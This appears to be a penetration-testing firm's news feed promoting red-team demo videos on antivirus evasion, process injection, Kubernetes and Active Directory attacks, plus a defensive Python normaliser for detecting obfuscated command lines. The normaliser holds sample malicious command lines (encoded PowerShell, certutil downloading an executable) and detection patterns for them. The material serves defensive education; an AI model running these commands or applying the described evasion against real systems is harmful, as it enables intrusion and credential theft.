RBT Security
We believe we can make a difference through our penetration testing, security awareness, Red Team, Adversary Emulation, and Purple Team assessments.
04/28/2026
Check out our latest demo on how advanced implants evade Windows Defender protections using memory encryption, API obfuscation, and hybrid C2 redirectors.
https://www.youtube.com/watch?v=8y7L1gCtk-M
"Windows Defender Evasion: Implant Analysis & Full Bypass | Havoc C2"
03/12/2026
How hackers hide their commands.
New research shows how "Command-Line Obfuscation" lets attackers disguise their commands with escape characters, inserted quotes and look-alike Unicode characters that the target program's parser ignores but detection rules do not.
1.- Hidden Intent: Masking malicious activity.
2.- Trusted Tools: Turning standard Windows programs into invisible weapons.
3.- Bypassing Alerts: Executing attacks without triggering security systems.
Learn more: https://www.wietzebeukema.nl/blog/bypassing-detections-with-command-line-obfuscation
Bypassing Detections with Command-Line Obfuscation Defensive tools like AVs and EDRs rely on command-line arguments for detecting malicious activity. This post demonstrates how command-line obfuscation, a shell-independent technique that exploits executables’ parsing “flaws”, can bypass such detections. It also introduces ArgFuscator, a new to...
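One way a detection engineer answers this is to normalise command lines before matching them, so the tricks the linked research describes (cmd.exe caret escapes, quote pairs inserted inside tokens, Unicode dash and slash look-alikes, mixed case) collapse back to the form a rule expects. The following is an added example written for this page; it is not code from the linked post or from ArgFuscator, and the sample command lines and rule names are constructed for illustration.

```python
"""Normalise Windows command lines before applying detection rules.

Added example, not from the original post or from ArgFuscator. It undoes a
handful of generic obfuscation tricks so that simple rules still match:
  - cmd.exe treats ^ as an escape character, so po^wer^shell runs powershell
  - quote pairs inside a token are dropped by most Windows argument parsers
  - en dash, em dash, fullwidth slash etc. are accepted by some parsers as -/
  - casing is ignored by executables but often not by rules
Sample command lines below are constructed for this example.
"""
import re
import unicodedata

# Characters that some Windows parsers accept in place of '-' or '/'.
OPTION_LOOKALIKES = {
    "\u2010": "-", "\u2011": "-", "\u2012": "-", "\u2013": "-",
    "\u2014": "-", "\u2015": "-", "\u2212": "-",
    "\uff0d": "-", "\uff0f": "/",
}

# Constructed rule set (names are hypothetical). Rules run on normalised text.
RULES = {
    # PowerShell accepts unambiguous prefixes of -EncodedCommand.
    "powershell_encoded": re.compile(
        r"\bpowershell(?:\.exe)?\b.*\s[-/](?:e|ec|en|enc|encodedcommand)\s"),
    "powershell_hidden_window": re.compile(
        r"\bpowershell(?:\.exe)?\b.*\s[-/](?:w|win|windowstyle)\s+hidden\b"),
    "certutil_download": re.compile(
        r"\bcertutil(?:\.exe)?\b.*[-/]urlcache\b"),
}


def normalise(cmdline: str) -> str:
    """Fold a raw command line into a canonical lower-case form."""
    # NFKC folds compatibility forms such as fullwidth letters and digits.
    s = unicodedata.normalize("NFKC", cmdline)
    for lookalike, ascii_char in OPTION_LOOKALIKES.items():
        s = s.replace(lookalike, ascii_char)
    s = s.replace("^", "")   # cmd.exe escape character contributes nothing
    s = s.replace('"', "")   # inserted quote pairs; trade-off: loses grouping
    s = re.sub(r"\s+", " ", s).strip()
    return s.lower()


def match_rules(cmdline: str) -> list[str]:
    """Return the names of rules that fire on the normalised command line."""
    norm = normalise(cmdline)
    return [name for name, rx in RULES.items() if rx.search(norm)]


# Constructed samples: four obfuscated variants and one benign admin command.
SAMPLES = [
    "powershell.exe -nop -w hidden -enc SQBFAFgA",
    "po^wer^shell -e SQBFAFgA",
    'cer"tutil" -url"cache" -f http://example.invalid/a.exe a.exe',
    "certutil \u2013urlcache \u2013f http://example.invalid/a.exe a.exe",
    "POWERSHELL.EXE \u2013W Hidden \u2013EC SQBFAFgA",
    "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(f"{match_rules(line) or ['-']!s:45} {line}")
```

The quote-stripping step is a deliberate trade-off: it defeats `cer"tutil"` style insertion at the cost of losing argument grouping, so rules that depend on exact argument boundaries should run on the raw line as well. This normaliser covers only shell-independent tricks; the per-executable parsing quirks catalogued by ArgFuscator need per-binary handling.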
03/04/2026
The "Invisible" Tool in Every Computer.
Did you know one of the most powerful hacking tools is already installed on almost every Windows PC? It's called PowerShell. Admins use it for day-to-day work, and attackers favour it because it is built in and signed by Microsoft, so its activity blends in with legitimate administration.
1.- Fileless Attacks: Running malicious code in memory so it doesn't leave files for scanners to find.
2.- Password Stealing: Pulling credentials directly from the system's memory.
3.- Silent Control: Taking over other computers on the same network using "legitimate" commands.
Learn more: https://hetmehta.com/posts/powershell-for-hackers/
PowerShell for Hackers: Exploitation Essentials | hetmehta.com A red teamer’s guide to PowerShell for post-exploitation: enum, privesc, persistence, and C2
02/26/2026
Is your Kubernetes cluster truly secure?
Our new demo reveals how a single misconfigured dashboard can give an attacker "God-mode" access to your entire infrastructure.
1.- Authentication Bypass: Gaining entry to the dashboard without valid credentials.
2.- C2 Integration: Deploying malicious pods that call back to a Sliver C2 framework for persistent control.
3.- Remote Control: Managing the cluster from anywhere using stolen service-account tokens.
Operational convenience should never come at the cost of infrastructure hardening.
See the full attack: https://www.youtube.com/watch?v=Ha2uDx4fhj8
Kubernetes pentest part 6: Dashboard Exploitation From Misconfiguration to Full Cluster Compromise In this demonstration, we walk through a real-world Kubernetes attack chain targeting one of the most commonly misconfigured components in a cluster the Kube...
02/21/2026
New demo from RBT Security!
We’re breaking down how to evade Microsoft Defender, AMSI, and ETW using MapView Code Injection. By creating a section object and mapping a view of it into both the local and the target process, the payload is written through the local mapping instead of with traditional cross-process memory writes, and we can deploy a Sliver C2 beacon with significantly less noise.
Check out the full workflow, including Native API resolution and post-ex enumeration using Sliver's fork-and-run with PPID spoofing, plus self-process injection to trigger built-in AMSI and ETW evasion.
Watch here: https://www.youtube.com/watch?v=Oq4GN9pHhUE
MapView Sections & Views Code Injection ⚠️ CORRECTION: At timestamp 18:52, the Process ID shown is 1688; this is incorrect. The correct PID is 4568. Using 1688 will spawn a new unintended process r...
02/02/2026
How hackers bypass internal security.
These attacks are still valid and used daily by threat actors:
1.- IPv6 Hijacking: Becoming the network's IPv6 DNS server to intercept authentication traffic.
2.- Delegation Abuse: Impersonating users via nxc.
3.- AS-REP Roasting: Requesting crackable AS-REP hashes for accounts that have Kerberos pre-authentication disabled.
4.- ADCS Attacks: Weaponizing digital certificates.
Demo:
Initial Access In An Internal Pentest Part 3 In this video, we continue our internal penetration testing series by demonstrating advanced post-initial access techniques in a controlled lab environment. ...
01/27/2026
How do hackers get around internal security? (Part 2)
We demonstrate real-world scenarios where an attacker turns a minor network mistake into total control of your servers.
Inside the Attack Chain:
1.- New "Admins": Attackers use the network to create their own "Admin" accounts and add themselves to protected groups.
2.- Empire & PowerShell: We show how Empire is used to send hidden commands that open a backdoor for the hacker.
3.- Encrypted Havoc Theft: We used the Havoc framework to execute Mimikatz in memory with the tool's bytes XOR-encrypted until run time. Because the on-disk and in-transit payload no longer matches known signatures, signature-based antivirus does not flag it while it extracts your passwords.
The Fix: Deep telemetry monitoring. By recording every digital footprint from new user accounts to hidden script commands, companies can stop the attack before the damage is done.
Demo: https://www.youtube.com/watch?v=Cx8dbqbwwu4
Initial Access In An Internal Pentest Part 2 In this video, we continue our initial access internal penetration testing series, focusing on post-initial-access techniques using C2 frameworks in a contro...
01/26/2026
How do hackers get around internal security? (Part 1)
It's often not through complex zero-day exploits, but by using the network's own protocols against it.
This internal penetration test shows how three common attacks, NetNTLMv2 capture, NTLM relay, and SMB proxying, are used to gain control of a network from the inside out.
Understanding these paths is the first step to securing your organization!
Demo:
Initial Access for an Internal Pentest Landing that first foothold inside an internal network is often the most critical phase of an engagement. This playlist deconstructs the transition from "una...
01/05/2026
Thread Context Code Injection – Video Demo
In this new RBT Security Labs video, we demonstrate how Thread Context Code Injection works and why it’s still used in real-world attacks.
Using a Havoc C2 payload, we show how attackers hijack an existing thread within a legitimate process by suspending it, rewriting its context so execution resumes at the injected payload, and then move on to post-exploitation activities such as system enumeration.
🎥 Watch the demo here: https://youtu.be/H2TID1RyNew
Thread Context Code Injection - Havoc C2 In this video demonstration from RBT Security Labs, we break down Thread Context Code Injection, a classic process injection technique that hijacks an existi...
12/05/2025
NEW VIDEO: Evading Microsoft Defender with APC Injection
Ever wonder how attackers hide malicious code inside legitimate programs while bypassing antivirus?
In our latest video, we demonstrate APC Injection via Suspended Thread, a stealthy technique that executes Adaptix C2 payloads inside trusted processes without triggering Microsoft Defender.
We show the complete attack chain:
1.- Payload injection into a legitimate process
2.- System reconnaissance with Seatbelt
3.- Credential extraction for lateral movement
👉 Watch the full demo on YouTube https://www.youtube.com/watch?v=CA9fohxfnkw
💬 Join our Discord community for more red team content
Perfect for cybersecurity professionals and anyone interested in offensive security!
https://discord.com/invite/8EfKbmgC
Evading Microsoft Defender: APC Injection Suspended Threads & Credential Extraction Join the Discord community to discuss and learn more: https://discord.com/invite/8EfKbmgC APC Injection via Suspended Thread In this video, we demonstrate how ...
Address
18 King Street East, Suite 1400
Toronto, ON
M5C 1C4